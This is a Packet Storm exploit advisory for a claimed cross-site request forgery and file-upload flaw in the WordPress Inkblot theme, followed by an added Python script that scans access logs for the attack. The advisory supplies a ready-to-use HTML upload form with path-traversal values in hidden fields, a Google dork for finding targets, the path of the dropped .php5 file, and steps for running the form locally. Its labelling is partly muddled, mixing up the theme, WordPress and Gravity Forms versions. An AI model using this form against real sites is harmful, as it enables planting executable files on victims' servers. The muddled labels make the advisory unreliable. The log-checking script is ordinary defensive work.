packetstorm | KingSkrupellos | PACKETSTORM:153006
May 22, 2019 - 12:00 a.m.

WordPress Inkblot Theme 4.9.10 Cross Site Request Forgery

2019-05-22 00:00:00
KingSkrupellos
packetstormsecurity.com
`####################################################################  
  
# Exploit Title : WordPress Inkblot Themes 4.9.10 Cross Site Request Forgery  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 22/05/2019  
# Vendor Homepage : wordpress.org - gravityforms.com  
# Software Download Link : github.com/mgsisk/inkblot/archive/master.zip  
# Software Information Link : wordpress.org/themes/inkblot  
# Software Affected Versions : 4.5.2 and 4.9.10 - 4.x  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : High  
# Google Dorks : intext:Powered by WordPress with Inkblot  
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Impact :  
***********  
The WordPress Inkblot theme is vulnerable to cross-site request forgery, caused by  
improper validation of user-supplied input. By persuading an authenticated user to visit   
a malicious Web site, a remote attacker could send a malformed HTTP request to   
perform unauthorized actions. An attacker could exploit this vulnerability to perform   
cross-site scripting attacks, Web cache poisoning, and other malicious activities.  
  
The web application does not, or cannot, sufficiently verify whether a well-formed,   
valid, consistent request was intentionally provided by the user who submitted the request.  
When a web server is designed to receive a request from a client without any mechanism   
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a   
client into making an unintentional request to the web server which will be treated as an   
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and   
can result in exposure of data or unintended code execution.  
  
####################################################################  
  
# CSRF Cross Site Request Forgery Exploit :  
****************************************  
<title>WordPress Inkblot Themes Input Exploiter</title>  
  
<form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">  
  
<body background=" ">  
  
<input type="file" name="file" id="file"><br>  
<input name="form_id" value="../../../" type="hidden">  
<input name="name" value="kingskrupellos.html" type="hidden">  
<input name="gform_unique_id" value="../../" type="hidden">  
<input name="field_id" value="" type="hidden">  
<input type="submit" name="gform_submit" value="submit">  
  
</form>  
  
# Directory File Path :  
***********************  
/_input__kingskrupellos.php5  
  
/_input__[YOURFILENAME].php5  
  
# Vulnerability Error :   
*******************   
{"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}  
  
# Vulnerability Error [ Successful ] :   
*******************************   
{"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}  
  
# Allowed File Extensions :  
*************************   
.html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf   
  
# Example Usage for Windows :  
******************************   
# Use with XAMPP Control Panel and your Localhost.  
# Use from htdocs folder located in XAMPP   
  
# 127.0.0.1/wordpressinkblotexploiter.html  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
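
A log check a site owner could run for the request pattern this advisory describes, as an added example that is not part of the original advisory: it flags POSTs to ?gf_page=upload and later requests for _input_* files with a script-capable extension. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script-capable extensions from the advisory's "Allowed File Extensions" list.
RISKY_EXT = (".php5", ".php2", ".phtml")
# Assumed format: Apache/nginx "combined" (ip ident user [time] "request" status ...).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/May/2019:10:00:01 +0000] "GET /?p=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/May/2019:10:02:13 +0000] "POST /?gf_page=upload HTTP/1.1" 200 118',
    '203.0.113.9 - - [22/May/2019:10:02:20 +0000] "GET /_input__test.php5 HTTP/1.1" 200 42',
    '203.0.113.9 - - [22/May/2019:10:02:25 +0000] "GET /_input__note.txt HTTP/1.1" 200 10',
    '198.51.100.7 - - [22/May/2019:10:03:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

def find_upload_abuse(log_lines):
    """Return (uploads, dropped_hits): POSTs to ?gf_page=upload, and requests
    for _input_* files whose extension the web server may execute."""
    uploads, dropped_hits = [], []
    for n, line in enumerate(log_lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "POST" and "upload" in parse_qs(url.query).get("gf_page", []):
            uploads.append((n, ip, int(status)))
            continue
        name = url.path.rsplit("/", 1)[-1].lower()
        if name.startswith("_input_") and name.endswith(RISKY_EXT):
            dropped_hits.append((n, ip, url.path, int(status)))
    return uploads, dropped_hits

def confirmed(uploads, dropped_hits):
    """Dropped-file requests answered 200 after the first upload POST."""
    if not uploads:
        return []
    first = uploads[0][0]
    return [h for h in dropped_hits if h[0] > first and h[3] == 200]

if __name__ == "__main__":
    ups, hits = find_upload_abuse(SAMPLE_LOG)
    for n, ip, status in ups:
        print(f"line {n}: upload POST from {ip} -> {status}")
    for n, ip, path, status in confirmed(ups, hits):
        print(f"line {n}: dropped script {path} served to {ip} ({status})")
```

Access logs do not record POST bodies, so the form_id and gform_unique_id values are not visible here; the check relies on the endpoint and the dropped file name instead.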